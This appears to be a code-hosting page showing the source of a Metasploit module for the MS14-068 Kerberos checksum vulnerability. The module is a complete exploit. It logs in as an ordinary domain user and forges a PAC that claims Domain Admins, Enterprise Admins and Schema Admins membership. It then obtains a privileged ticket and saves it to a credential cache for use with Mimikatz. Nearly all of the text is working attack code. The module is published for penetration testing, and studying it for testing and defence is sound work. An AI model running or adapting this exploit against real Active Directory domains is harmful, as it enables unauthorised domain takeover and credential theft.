Path: blob/master/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
34139 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Auxiliary::Report7include Msf::Exploit::Remote::Kerberos::Client89def initialize(info = {})10super(11update_info(12info,13'Name' => 'MS14-068 Microsoft Kerberos Checksum Validation Vulnerability',14'Description' => %q{15This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem16exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS17request, where a domain user may forge a PAC with arbitrary privileges, including18Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to19a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz20help. It has been tested successfully on Windows 2008.21},22'Author' => [23'Tom Maddock', # Vulnerability discovery24'Sylvain Monne', # pykek framework and exploit25'juan vazquez' # Metasploit module26],27'References' => [28['CVE', '2014-6324'],29['MSB', 'MS14-068'],30['OSVDB', '114751'],31['URL', 'http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx'],32['URL', 'https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/'],33['URL', 'http://web.archive.org/web/20180107213459/https://github.com/bidord/pykek'],34['URL', 'https://www.rapid7.com/blog/post/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit'],35['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],36['ATT&CK', Mitre::Attack::Technique::T1212_EXPLOITATION_FOR_CREDENTIAL_ACCESS],37['ATT&CK', Mitre::Attack::Technique::T1558_001_GOLDEN_TICKET]38],39'License' => MSF_LICENSE,40'DisclosureDate' => '2014-11-18',41'Notes' => {42'AKA' => ['ESKIMOROLL'],43'Stability' => [CRASH_SAFE],44'SideEffects' => [IOC_IN_LOGS],45'Reliability' => []46}47)48)4950register_options(51[52OptString.new('USERNAME', [ true, 'The Domain User' ], aliases: ['USER']),53OptString.new('PASSWORD', [ true, 'The Domain User password' ]),54OptString.new('DOMAIN', [ true, 'The Domain (upper case) Ex: DEMO.LOCAL' ]),55OptString.new('USER_SID', [ true, 'The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000'])56]57)58end5960def run61print_status('Validating options...')6263unless datastore['USER_SID'] =~ /^S-(\d+-){6}\d+$/64print_error('Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000')65return66end6768domain = datastore['DOMAIN'].upcase6970print_status("Using domain #{domain}...")7172user_sid_arr = datastore['USER_SID'].split('-')73domain_sid = user_sid_arr[0, user_sid_arr.length - 1].join('-')74user_rid = user_sid_arr[user_sid_arr.length - 1].to_i7576checksum_type = Rex::Proto::Kerberos::Crypto::Checksum::RSA_MD577etype = Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC78encryptor = Rex::Proto::Kerberos::Crypto::Encryption.from_etype(etype)79password_digest = encryptor.string_to_key(datastore['PASSWORD'])8081pre_auth = []82pre_auth << build_as_pa_time_stamp(key: password_digest, etype: etype)83pre_auth << build_pa_pac_request8485print_status("#{peer} - Sending AS-REQ...")86res = send_request_as(87client_name: datastore['USERNAME'].to_s,88server_name: "krbtgt/#{domain}",89realm: domain.to_s,90key: password_digest,91pa_data: pre_auth,92etype: [etype]93)9495unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP96print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR97print_error("#{peer} - Invalid AS-REP, aborting...")98return99end100101print_status("#{peer} - Parsing AS-REP...")102103session_key = extract_session_key(res, password_digest)104logon_time = extract_logon_time(res, password_digest)105ticket = res.ticket106107pre_auth = []108pre_auth << build_pa_pac_request109110groups = [111Rex::Proto::Kerberos::Pac::DOMAIN_ADMINS,112Rex::Proto::Kerberos::Pac::DOMAIN_USERS,113Rex::Proto::Kerberos::Pac::SCHEMA_ADMINISTRATORS,114Rex::Proto::Kerberos::Pac::ENTERPRISE_ADMINS,115Rex::Proto::Kerberos::Pac::GROUP_POLICY_CREATOR_OWNERS116]117118pac = build_pac(119client_name: datastore['USER'],120group_ids: groups,121domain_id: domain_sid,122user_id: user_rid,123realm: domain,124logon_time: logon_time,125checksum_type: checksum_type126)127128auth_data = build_pac_authorization_data(pac: pac)129sub_key = build_subkey(subkey_type: etype)130131print_status("#{peer} - Sending TGS-REQ...")132133res = send_request_tgs(134client_name: datastore['USER'],135server_name: "krbtgt/#{domain}",136realm: domain,137session_key: session_key,138ticket: ticket,139auth_data: auth_data,140pa_data: pre_auth,141subkey: sub_key142)143144unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP145print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR146print_error("#{peer} - Invalid TGS-REP, aborting...")147return148end149150print_good("#{peer} - Valid TGS-Response, extracting credentials...")151152cache = extract_kerb_creds(res, sub_key.value)153Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(cache, framework_module: self, host: rhost)154end155156def warn_error(res)157res.error_code.to_s158end159end160161162